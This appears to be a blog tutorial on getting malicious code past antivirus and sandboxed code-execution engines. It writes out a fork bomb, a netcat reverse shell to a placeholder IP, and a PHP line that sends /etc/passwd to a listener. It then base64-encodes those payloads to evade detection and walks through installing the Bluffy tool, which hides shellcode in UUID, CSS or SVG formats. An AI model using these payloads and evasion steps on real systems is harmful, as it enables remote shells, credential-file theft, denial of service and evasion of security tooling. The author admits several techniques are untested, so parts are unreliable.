I am not pointing out a specific antivirus software. This article is more about how you can execute the malicious code on some code execution engine that is executing code after checking the syscalls, taking all the prevention measures so that an attacker might not be able to run that is not supposed to run.           

An attacker might run a fork bomb in order to crash the server, and if the server is not allotting a separate environment for each user, there will be an impact on the server’s availability. There are a lot of malicious codes such as fork-bomb, various reverse shells and syscalls (calling for interrupting signals).

brief on fork-bomb

<mark style="background-color:rgba(0, 0, 0, 0)" class="has-inline-color has-vivid-cyan-blue-color"><kbd>:(){ :|:& };:</kbd></mark>

If you don’t know, the above line is really dangerous and you don’t wanna run it on your system. actually, I would never suggest you but if you are running a virtualization environment of Linux, you can try it but make sure that you have saved all of your work already on that machine. fork bomb will make your system stop, it’s kinda like DOS but on your System, not on a server/service(apache/FTP). The `:` is the name of the function, and then we have the function block `{}`. In the function block, we are calling the function `:` and piping it to itself, that is recursion basically. And this code block is being sent to run on the background like a thread. After closing the function block we call our function and magic starts.

Reverse shells

Most of you must know about reverse shells already, but if you don’t, the reverse shell is the shell you gain, in order to get access (command execution/RCE) to a victim’s PC. You can just try out these reverse shells on your own systems using Netcat, [Ba z fi] sh, PHP, Python, PowerShell, Perl and many more. There is a really good website that generates reverse shell from Bash to Dart: https://www.revshells.com/

Or you can prefer payloadAllTheThings, which actually will help you to understand the logic behind the code of the reverse shell.

<IMG>

Generally, an antivirus looks for malicious code. for example, if that code is in Python, PHP or maybe in Bash.

eval("nc 10.10.x.x 1234 -e /bin/sh") #python
system("curl http://127.0.0.1:8000/$('cat+/etc/passwd')"); #PHP
/bin/bash -c ':(){ :|:& };:' #Bash

Antivirus will immediately stop the execution as it finds such codes. But the question is, how one can run these malicious codes without letting antivirus know. Maybe we can somehow encrypt or encode this malicious data and later decrypt it while we are executing it. To understand what I just said, we will encode the malicious code in base64 in order to make it less suspicious or less detectable.

Payloads will look like this:

eval("bmMgMTAuMTAueC54IDEyMzQgLWUgL2Jpbi9zaAo=") #python
system("Y3VybCBodHRwOi8vMTI3LjAuMC4xOjgwMDAvJCgnY2F0Ky9ldGMvcGFzc3dkJykK"); #PHP
/bin/bash -c 'OigpeyA6fDomIH07Ogo=' #Bash

By the way, this bypass won’t work on any antivirus. I am just explaining this so that you can get an idea of what I am about to do further. Can you think of some other method that can make your payloads(malicious code) undetectable? Can you use some RSA encryption and decryption techniques? will Ciphers help you to hide your data? actually, these methods might work. And remember, I haven’t tried these, so I cannot guarantee it.

There was this python project which seems to do what we are trying to achieve here. I came across this tweet, it had the name Bluffy, a shellcode format changer. In case you don’t know what shellcode is, a shellcode is a set of instructions just like a binary file (exe/elf/macho). Moreover, I am going to use a binary as a shellcode for demonstration.

You can clone this tool from Github. it has some pre-requirements that you will need to have/install to run this tool without any error.

git clone https://github.com/ad-995/bluffy
cd bluffy
sudo pip3 install rich
sudo apt install mingw-64
sudo wget https://packages.msys2.org/package/mingw-w64-x86_64-pcre2?repo=mingw64 -P /usr/lib/gcc/x86_64-w64-mingw32/10-win32

If the setup was error-free you can go ahead and run this tool using python3

python3 ./bluffy.py

This is really cool ASCII art. It has an argument to specify binary (-b) which will be our shellcode(malicious code) and there is an option of xor (-x). I cannot appreciate enough the creators of this tool (Mez0, Michael Ranaldo). both of the guys have done a really nice job. there is one more option for masking (-m).

actually, this tool provides five masking options for the shellcode along with xor.

  1. UUID
  2. CLSID
  3. SVG
  4. CSS
  5. CSV

Let’s just create a binary quickly. we can just write a simple HelloWorld program in C and compile it to get an elf. I don’t know how well it works on the go binaries and others. It is supposed to get just a shellcode, created with bare NASM. so, we cannot expect much from it.

mkdir tmp && cd tmp
vim helloworld.c
<em>#include <stdio.h>
void main()
{
  printf("Hello World!!");
}
</em>
gcc helloworld.c -o shellcode

well, now you can run it easily and select the mask whatever you want. for demonstration, I am using UUID. you can go with CSS or any other.

python3 ./bluffy.py -m uuid -x ./tmp/shellcode

It says it has written into uuid.h and if we take a look in the uuid.h`

uuids

There are many UUIDs at first and in the last lines, it seems like a logic that will use these UUIDs to remake our shellcode.

Now you can just compile it to get your binary back. you will need the Makefile for the compilation or you can just do it manually after reading the instructions of the Makefile.

CC = gcc#x86_64-w64-mingw32-gcc
FLAGS = -Os -m64 -ffunction-sections -Wl,--strip-all
LIB = -lrpcrt4
uuid:
	$(CC) main.c $(FLAGS) $(LIB) -o uuid.exe

some changes may be required like the binary was not exe, it was elf binary.

RELATED ARTICLESMORE FROM AUTHOR

LEAVE A REPLY

Please enter your comment!
Please enter your name here